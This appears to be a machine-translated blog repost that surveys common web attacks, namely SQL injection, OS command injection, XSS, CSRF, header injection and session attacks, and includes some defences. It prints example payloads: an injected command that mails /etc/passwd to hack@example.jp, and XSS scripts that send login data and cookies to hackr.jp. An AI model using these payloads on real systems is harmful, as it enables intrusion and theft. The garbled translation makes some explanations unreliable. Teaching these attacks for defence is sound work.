Technical attacks against Web

Others 2019-11-25 20:07:04 views: null
  • Active attack
    • SQL injection attacks
    • OS command injection attacks
    • Session hijacking
  • Passive Attack
    • XSS attacks
    • CSRF attacks
    • HTTP header injection attacks
    • Session fixation attack

First, take the initiative to attack

1.SQL injection attacks

    • What is SQL?
      SQL database language is used to operate a relational database management system can be operated or data defining data.
    • What is SQL injection?
      SQL injection means, attack illegal SQL generated by Web applications to run against the database used. If there are omissions in the way SQL statements on the call, it is possible to execute injected malicious illegal SQL statements.
    • SQL Case:
SELECT * FROM bookTb1 WHERE author = '作者'--' and flag = 1

SQL statement - after all treated as a comment that and flag = 1 is ignored.

2.OS command injection attacks

    • What is OS command injection attacks?
      OS command injection attacks is through the Web application, the purpose of performing an illegal operating system commands such an attack.
    • How to attack?
      Web applications can be invoked from the operating system command by Shell. If there are omissions Shell when invoked, you can perform the insertion of an illegal OS command. May perform various installed on the OS through the OS injection attacks.
    • Example:
|/usr /sbin /sendmail ; cat /etc / passwd | mail hack@example.jp
An attacker input values ​​(; cat / etc / passwd | mail [email protected]) containing a semicolon (;). This symbol OS command, will be parsed as a plurality of spaced indicia execution command. After sendmail command are separated, and the latter will perform cat etc / passwd / | mail [email protected] such commands as a result, contains a Linux account information / etc / psswd files sent to you by mail in the form of a hack @ example.jp.

3. session hijacking (Session Hijack)

Session hijacking refers to the attacker by some means (for example: XSS get each other's Cookie obtain ID) to get the user's session ID, and the illegal use of this disguised as user ID, to achieve the purpose of attack.

  • Way to get the session ID
    1. Presumed session ID generated by the informal method;
    2. XSS attack by eavesdropping or stolen session ID;
    3. Forcibly acquired session ID through the session fixation attack (Session Fixation).

Second, passive attack

1.XSS Attacks

What is XSS
Cross Site Scripting attacks (Cross-Site Scripting, XSS) refers to a running attack illegal HTML tags or JavaScript carried out by security vulnerabilities within the Web site registered user's browser. XSS is a passive attackers use fishing line to set traps triggered. For example: create dynamic HTML section there may be hidden security vulnerabilities.

  • influences:
    • Defraud using false personal information input form.
    • Cookie value using the script to steal user, the victim unknowingly help the attacker to send malicious requests.
    • Show fake articles or pictures.
  • Avoid methods:
    • All local user input is not safe.
    • All show the user enters the place is not safe.
    • js which do not use eval.
    • As little as possible to use innerHTML, use innerText.
  • Assault columns:
  1. Set a trap in the form
http://example.jp/login?ID="><script>var+f=document=>
.getElementById('login');+f.action="http://hackr.jp/pwget";+f.method=>
"get";</script><span+s="

After opening the URI, nothing has changed on intuitive browser, but secretly set a good script is running, and when the user enters the ID and password in the form will be sent directly to the attacker's Web site (that is, hackr.jp) , resulting in personal login information from being stolen.

 2. User Cookie theft attack
scripts maliciously constructed the same way can cross-site scripting attacks, to steal the user's Cookie.

<script src = http://hackr.jp/xss.js></script>

Http://hackr.jp/xss.js within the specified script file that uses the following piece of code written in JS

var content = escape(document.cookie)
document.write("<img src = http://hackr.jp/?")
document.write(content)
document.write(">")
This JavaScript implementation of the above procedures may exist on the Web application security vulnerability cross-site scripting attacks, you can visit the Cookie information in the Web application at the domain name. This information will then be sent to the attacker's Web site (http://havkr.jp), recorded in his log in the log, the results, so the attacker to steal the user's information Cookie.

2.CSRF Attacks

CSRF talk about
cross-site request forgery (CSRF) attack is a trap set by the attackers, forcing unintended personal information on the user authentication has been completed or set some status information update, a passive attack.

  • Cross-site request forgery impact caused by:
    • Using the updated setting information authenticated user rights.
    • The use of purchased goods certified user rights.
    • The use of published remarks on the message board certified user rights.
  • anti-csrf-token protocol
    • When the server receives the route request, it generates a random number, when rendering a page request to the random number embedded in the page (typically buried in form form, <input type = "hidden" name = "_ csrf_token" value = "xxxx" >)
    • Server provided setCookie, to the random number as a session or cookie into the user's browser Species
    • When a user sends bring GET or POST request _csrf_token parameter (for Form submission form can be directly, as it will automatically submit all input to the background in the current form, including _csrf_token)
    • Backstage after receiving the request resolution requests the cookie obtain the value _csrf_token, and then make a comparison and user requests _csrf_token submitted, if they are equal indicate that the request is legitimate.
  • Need some attention:
    • Token in Session. If the Token is stored in Cookie, the user's browser to open a lot of pages. After some pages are using Token consumed new Token will be re-implanted, but those old Tab page corresponding to the HTML or old Token. This will make the user feel why a few minutes before opening page can not be submitted properly?
    • Minimize the use of GET. If the attacker on our website uploaded a picture, the user is actually sending the images to load when the attacker's server request, the request will be represented with a referer url of the page where the current picture. And if you use the GET method to the interface, then the URL of the form:
https://xxxx.com/gift?giftId=aabbcc&_csrf_token=xxxxx

That is equivalent to the attacker gained _csrf_token, a short time can use this token to operate other GET interface.

3.HTTP header injection attacks

  • What is HTTP header injection attacks?
    HTTP header injection attack by an attacker in the header field in response to insert a line, add any header in response to an attack tiger body.
  • What is the HTTP response splitting attacks?
    Add content to attack within the first portion of the body known as HTTP response splitting attacks.
  • HTTP header injection attacks affecting:
    • Cookie settings any information.
    • Redirected to any URL.
    • Displaying arbitrary body (HTTP response splitting attack).

4. The session fixation attack

Session fixation attack force users to use the attacker's session ID.

  • Session fixation attack case:
    1. Attacker login page
    2. Publishing server sends a session ID (http://example.com/SID=f5d1234567) to the attacker, the session ID (non-certified) state.
    3. Will be in the 2 URL as a trap to induce the user to go certification.
    4. After user authentication, the session ID (the user is authenticated) state.
    5. After 4 and then visit the URL 2.

Transfer: https://www.jianshu.com/p/f2a08107599a

Guess you like

Origin www.cnblogs.com/vickylinj/p/11929948.html
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com